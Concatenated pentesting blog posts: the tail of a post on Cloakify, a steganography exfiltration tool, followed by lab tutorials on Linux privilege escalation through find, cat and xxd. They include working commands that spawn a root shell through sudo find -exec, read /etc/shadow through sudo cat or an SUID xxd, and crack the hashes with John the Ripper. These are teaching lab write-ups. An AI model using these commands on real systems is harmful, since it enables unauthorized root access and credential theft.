Now again we try to covert the content of the secret.txt file by hiding it behind the cloaked file. And it is very simple as performed earlier with little modification. So now we can run the cloakify.py file with the help of python.

C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt
type dump.txt

Thus, we can observe that with the help of cloakify we have transformed the filetype cannot be detected easily.

Conclusion: cloakify-factory could be very useful for exfiltrating data internally as we saw it has many cipher script that used to the cloaked data file and hence it is a very effective tool for performing text-based steganography.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Cloakify-Factory: A Data Exfiltration Tool Uses Text-Based Steganography appeared first on Hacking Articles.

Today in this article we are back with another most advantageous command from the series of Linux for Pentester i.e. “Find’. The Find command is used to search the list of files and directories, so by knowing this fact, we will now illustrate how we can avail it in Privilege Escalation.

Table of Content

Introduction to Find

• Major Operation performed using Find

Exploiting Find

• Sudo Rights Lab setups for Privilege Escalation
• Exploiting Sudo rights
• SUID Lab setups for Privilege Escalation
• Exploiting SUID

Introduction to Find

 Find command is a command line facility for a walk around a file pyramid structure to find the exact location of the file and directory as per the user’s desire. This search command can be used by the variability of services like search any file by “size, permissions, date of modifications/access, users, groups” and many more as per user requisite.

Alike every command the Find also can be concisely understood by its help/man command as per below image.

find --help

Major Operation performed using Find

Search any file by particular name in the current directory: This command supports the user to search any file by a specific name. Suppose we want to search a text file by the name of “raj” from current directory then simply compose the command as per below screenshot.

find . -name raj.txt

Search any file by particular name in the home directory: If we wish to find all the files under home directory by desired file name, in our case it is “raj.txt” then from command as below:

find /home -name raj.txt

(It will permit the user to find all “raj.txt” file under home directory)

Find files by its extension: This can be returned by specifying the particular file extension. If any user wants to fetch any file by its extension, then it can be done by “-type f” option followed by Find As in our scenario we are fetching for .txt

One can also use the “-type d” option instead of the “-type f” for retrieving the directory.

find / -type f -name "*.txt"

This command will support the user for printing all .txt file as the desired output.  

Find files with full permission: Whenever anybody wishes to explore for the files that have full permission i.e. “777” then it can be simply acquired by “-perm 0777” followed by Find command with the option “-type f” which will print the output for all the files that have“777”

find . -type f -perm 0777 -print

To find all files for a specific user of a directory: If we need to find all those files that belong to a particular user under any selective directory then that we can execute this by command as:

find /tmp -user raj

In our instance, we are finding for all those files that belong to user “raj” under “tmp directory”.

• To find all hidden files: If we want to find all hidden files within any directory then we will type the command as below:

find /tmp -type f -name ".*"

This command will give a consequence for all hidden files in the current directory.

To find all readable files within a directory: To find all readable files from a specific directory. In the below screenshot we are discovering for all those files that is in the readable form under /etc directory

find /etc/ -readable -type f 2>/dev/null

By typing above command, we will get all readable files that come under /etc as output.

Find SUID files: Whenever any command runs, at which SUID bit is set then its effective UID becomes the owner of that file. So, if we want to find all those files that hold the SUID bit then it can be retrieved by typing the command:

find / -perm -u=s -type f 2>/dev/null

Find SGID files: The SGID permission is similar as SUID but the only difference is that, whenever any command runs at which SGID permission is set, then the process will have the same group ownership as the owner of the file. So, to run all those files that possess SGID bit, type command:

find / -perm -g=s -type f 2>/dev/null

To find SUID & SGID files simultaneously: If we want to fetch all those files simultaneously at which both bits i.e. “SUID & SGID” are set then frame command as:

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

To find all writable file: To find any writable directories within any desired directory such as: /home, /tmp, /root, then we will run the command as:

find /home -writable -type d 2>/dev/null

As per below image we have find all writable directories from /home.

Exploiting Find

Sudo Rights Lab setups for Privilege Escalation

Now we will set up our lab of Find command by granting it higher privilege i.e. with administrative rights. As we know the performance of every command gets changed after the influence of higher privileges. Same we will check for our Find command and will grasp what effect it would have after the accomplishment of sudo rights and how we can custom it more in privilege escalation.

To recognize it more visibly first we will create a local user (test) who retain all sudo rights as root.

To add sudo right open /etc/sudoers file and frame below command as user Privilege specification.

test  ALL=(root) NOPASSWD: /usr/bin/find

Exploiting Sudo rights

Now we will start exploiting Find service by taking the privilege of sudoer’s permission. For this, we must have a session of the victim’s machine which will enable us to devise the local user access of the targeted system which will support us further to escalate the root user’s rights.

 For this we need to connect with the target machine with ssh, so type the command as shown below for performing the same.

ssh test@192.168.1.108

Then we checked for sudo right of “test” user (if given) and found that user “test” can execute Find command as “root” without a password.

sudo -l

Find command let you perform some specific action such as “print, delete and exec”. So here we are taking the privilege of “exec” for executing the command to access root shell by running /bin/bash with the help of find command as given below:

sudo find /home -exec /bin/bash \;

On running above command, we have successfully escalated the root shell as shown in the below image.

SUID Lab setups for Privilege Escalation

As we know the SUID bit permission enables the user to execute any files as the ownership of existing file member. Now we are enabling SUID permission on Find so that a local user can take the opportunity of Find as the root user.

Hence type following for enabling SUID bit:

which find
chmod u+s /usr/bin/find
ls -la /usr/bin/find

Exploiting SUID

As we know we have access to victim’s machine so we will use Find command to identify binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to recognize that SUID bit is empowered for so many binary files, but our concerned is:   /usr/bin/find.

As we know Find command supports the user to perform some specific action such as print, delete and exec. So here again we are taking the privilege of “exec” for executing another command i.e. “whoami”

find raj -exec "whoami" \;

Similarly, you can take honour of Find command for escalating the root privileges.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: Find Privilege Escalation appeared first on Hacking Articles.

Today we are going to talk about CAT command and learn how helpful the cat command is for Linux penetration testing and how we’ll progress cat to scale the greater privilege shell.

Table of Content

• Introduction to CAT
• Major Functions of CAT command
• Sudo rights Lab setups for Privilege Escalation
• Exploiting Sudo Rights

Introduction to CAT

In Linux, Cat stands for “catenate,” which is one of Unix-like operating system most frequently used commands. It reads file information and displays its content as an output. It enables us to build, view and link files. So, we can not only see the content using CAT command; apart from this we can, copy the content of the file to some other file and view the files with numbers and so on. Not only this we will do such things which is not only new but is what we might have not thought of. We will perform Privilege Escalation using CAT command. That’s sounds interesting. Isn’t it? So, let’s start-

Major Functions of CAT command

At first, we will run cat -h command which means help and which will tell you about all the options which are available in CAT command as we can see in the picture below.

cat --help

Write and Read a file:

Our next step is to create a file using the cat command. And for this, we will use less than sign (>) after cat command to generate a new file. So, we have created a new file named notes.txt by using (>) this sign after cat command and write the content which you want to keep in the file as in our case I have written “Welcome to Hacking articles” in the file notes.txt

cat > notes.txt

Not only this we can also edit the content of the existing file without opening the file by using less than sign twice (>>) as you can see in the screenshot that we have added “Join Ignite Technologies”  in notes.txt

cat >> notes.txt
cat notes.txt

Now we can confirm this by reading the file once again.

cat notes.txt

Number all output lines:

Now let’s say if we want to view file contents preceding line numbers or in other words you want to view the output serialized. So first we will create a new text file named dict.txt in which we have written some content which is going to be easily readable number wise with -n command.

cat dict.txt
cat -n dict.txt

As a result, this add a serial number column for every line as shown below:

Overwriting a file

Now we want to copy the content of file dict.txt into notes.txt or in other words we want to overwrite the file notes.txt. So in order to do, this first we write the file name from which the content is to be copied and then we will write the file name whose content we want to replace followed by less than sign(>).

Syntax: cat [file1] > [file2]
cat dict.txt > notes.txt

As you can observe in the picture below that we have replaced the content of notes.txt with dict.txt

Concatenating files:

Now we want to merge two files together or in other words, we want to combine two files. So, what will we do? Its again very simple; we will use less than sigh here but now twice (>>) and the content will be replaced successfully. So here we have another new file which is pass.txt and then we will proceed towards merging two files for which we will use (>>) sign again as we have done in the image below. Now again we will use -n to put this content number wise which we have done above.

cat > pass.txt
cat dict.txt >> pass.txt                
cat -n pass.txt

As result, you can observe that we have concatenate dict.txt in the pass.txt file.

Reverse order

As the name suggests and we can reverse all the content using tac command which is just a reverse of cat command and it works for this purpose only.

cat dict.txt

With the help of tac command, we try to reverse the file by making a vertical flip as shown below.

Sudo rights Lab setups for Privilege Escalation

Now here our next step is to set up the lab of Sudo rights or in other words to provide Sudo privileges to a user for cat executable. Here we are going to add a user by the name of the test in the suoders files and here we have given permission to user test to run cat command as root user.

Exploiting Sudo Rights

Now we will connect through ssh in kali and after that, we will run sudo -l which is sudo list and through which we can see that user test has the permission to run cat as root user.

ssh test@192.168.1.108

Now our next step is to exploit sudo rights through cat command. So, we will run cat /etc/shadow command to see all the users and their respective passwords hashes.

sudo -l
sudo cat /etc/shadow

Wonderful! We have got all the user’s list and their passwords’ hash value.

Cracking the Hash Password

Now our next step is to crack the hash value so that we are going to use “John the Ripper” tool to crack this hash value in order to get the password in decrypted form. So first we have taken one user whose password we want to check. So, run the following command in the terminal-

john hash --show

Great! We have cracked the password successfully. Now we will switch user raj to check if we can log in through that password and we can see that we have successfully logged in as raj user.

Now we will run sudo -l command to check if user raj, and found he has all the root permissions.

sudo -l
sudo su

Now, we will again try to switch to user root and we are logged in as root and then we run id command we get to know that we got a root shell.

So, we have performed privilege escalation through cat command successfully.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Linux for Pentester: CAT Privilege Escalation appeared first on Hacking Articles.

In this article, we are going to make our readers familiar with another influential command i.e. “xxd” which assist for converting any hex dump to a binary and vice-versa. So, by knowing this certainty now we will check how wisely we can make it applicable in Privilege Escalation.

Table of Content

Introduction to xxd

• Major Operation performed using xxd

Exploiting xxd

• SUID Lab setups for Privilege Escalation
• Exploiting SUID

Introduction to xxd

As we know whenever we want to convert any format of a file into another format then, we can grab that simply by using online converter which helps to convert a file into the desired format such as: “pdf to word, jpg to pdf, excel to pdf” etc. but what if someone desired to get any file into its hexadecimal form or binary??

So, in this article, I’m emphasizing the way through which one can easily get hex dump or binary format for any file. This can be achieved by one of Linux command i.e. “xxd”. The xxd command enables the user to generate a hex dump of a given file and can also reverse a hex dump back to its original ASCII form.  This phenomenon can also help in the procedure of encoding and decoding any mysterious file.

First, we will check for its help/man command to identify how we can use xxd for this conversion.

xxd -h

By typing the above command, we can achieve a list of arguments that can be used with xxd for generating hex dump of a given file.

Major Operation performed using xxd

Converts file contents into hex: For instance, I’m creating a new file by the name of “secret.txt” and now I want to convert its whole content into the hexadecimal form so, I will type the below mentioned command to execute the desired output.

Syntax: xxd <options> filename

xxd secret.txt

By the below image it’s clear that xxd has generated the hex dump for the file “secret.txt”.

Here, we can observe the following hex dump are obtained its default format such as:

• Indexing the number of lines. (eg: 00000000, 00000010, 00000020…………00000220)
• The default number of octets per group is 2 (-e: 4 little-endian hexdump) which is groupsize of 4 bytes. (eg: 4967 6e69…………6e67)
• The standard column length is equal to 16 bits with whitespace. (eg: Ignite is Having)

Skip the nth line with xxd: While converting a file there may be lots of data that may not be of our use so, instead of obtaining whole data we can skip those contents that are needless (skip the no. of lines). For this, we can use xxd to skip the nth line and produce hex value after skipped lines.

Suppose in our circumstance we want to generate hex dump from line 5 ahead then this can be attained by using “-s” argument followed by xxd command.

xxd -s 0x50 secret.txt

To limit output up to particular length: As above I have explained how one can retrieve data by skipping no. of lines i.e. output from a specific line but, if we need to limit the length of standard output then we will use “-l” argument instead of “-s”.

Here I’m limiting the length of my contents to print the data up to limited range i.e. 5^th line as shown in below screenshot.

xxd -l 0x50 secret.txt

Hence, we can observe the difference between both commands; the first command generates the hex value initialized from the 6^th line and the second command ended with the 5^th line as per hex indexing, take reference from the above screenshot.

Converts file contents into binary: In above all image we have noticed that file has been dumped into its “hex form” but whenever we wish to produce the “binary form” for any file then we will use “-b” option. On using this option, the result will switch to its bit dump (binary digit) by grouping the output data into its octet using “1 or 0” rather than hex dump. To attain the same as per below image type command:

xxd -b secret.txt

Set column length: As above I have described how we can skip and limits the output up to range. Now I will illustrate how we can set column length. By default, it used to be 12, 16 for any dumped file but now I will explain what else we can do.

For this I’m taking three occurrences:

Default: As we know the default column length is 16. This will print 16 characters including whitespace.

xxd -l 0x20 secret.txt

Set the column length up to 32: I have set end index to limit printing data range by using “-l” option now after doing so I will set column length up to “32” which can be achieved by using “-c” argument.

xxd -l 0x40 -c 32 secret.txt

From the given below screenshot, we can easily realize how xxd has limits the column length.

Set the column length up to 9: As above, now I have set column length up to “9” by following the same process as discussed above.

xxd -l 0x40 -c 9 secret.txt

In all case, xxd has created the hex dump for a file by counting each character with whitespace.

Print Plain hex dump style: The postscript option “-ps” is used only in case when we required our output in plain hex dump style. Here we have saved its output inside hex file to obtain the plain hexadecimal value of the secret.txt file. To ensure the result we have used the cat command to read output from hex file.

xxd -ps secret.txt > hex
cat hex

From the below image, it can be cleared that how xxd has created plain hex dump style for file “secret.txt” by restricting the plain text.

To revert any file: To return any generated output into its original form we can use the “-r” option. In our case we have used “-r -p” to print the reverse output from plain hex dump style into its ASCII form.

xxd -r -p hex

Groupsize bytes: If we required to group the output into a number of octets then we can use the “-g” option for this purpose. By default, it is 2 (-e: 4 little-endian hex dump). So, if we set this value to 4 then it will be grouped into 8 bits.

In below screenshot, we have set this value to 8 which will group into 16 bits as desired output to concise the result.

xxd -l 0x30 -g 8 secret.txt

SUID Lab Setups for Privilege Escalation

The SUID bit permission enables the user to perform any files as the ownership of existing file member. Now we are enabling SUID permission on xxd, so that a local user can take the opportunity of xxd as the root user.

Hence type following for enabling SUID bit:

which xxd
chmod u+s /usr/bin/xxd
ls -al /usr/bin/xxd

Exploiting SUID

Now we will start exploiting xxd service by taking the privilege of SUID permission. For this, I’m creating a session of the victim’s machine which will permit us to develop the local user access of the targeted system.

Now we need to connect with the target machine with ssh, so type the command:

ssh test@192.168.1.103

As we know we have access to victim’s machine so we will use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

Here we came to recognize that SUID bit is permitted for so many binary files, but our concerned is:   /usr/bin/xxd.

Taking privilege of SUID permission on xxd we are going to grab the shadow’s file for extracting password hash file.

In the below image first, I have requested to expose the /etc/shadow file by the use of xxd which will produce the hex dump for the file along with that I have piped the xxd command to revert its output.

xxd "/etc/shadow" | xxd -r

Now I have use john the ripper tool to crack the password hashes. By doing so we will get credential of the user as shown in below image.

john hash

Once we get the user’s credential then we can switch user. Here first we check sudo rights for user: raj and noticed that user “raj” has ALL privileges.

su raj
sudo -l
sudo su

Therefore, we switch to the root user account directly and access the root shell as shown in the image. Hence, we have successfully accomplished our task of using xxd command for Privilege Escalation.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: xxd Privilege Escalation appeared first on Hacking Articles.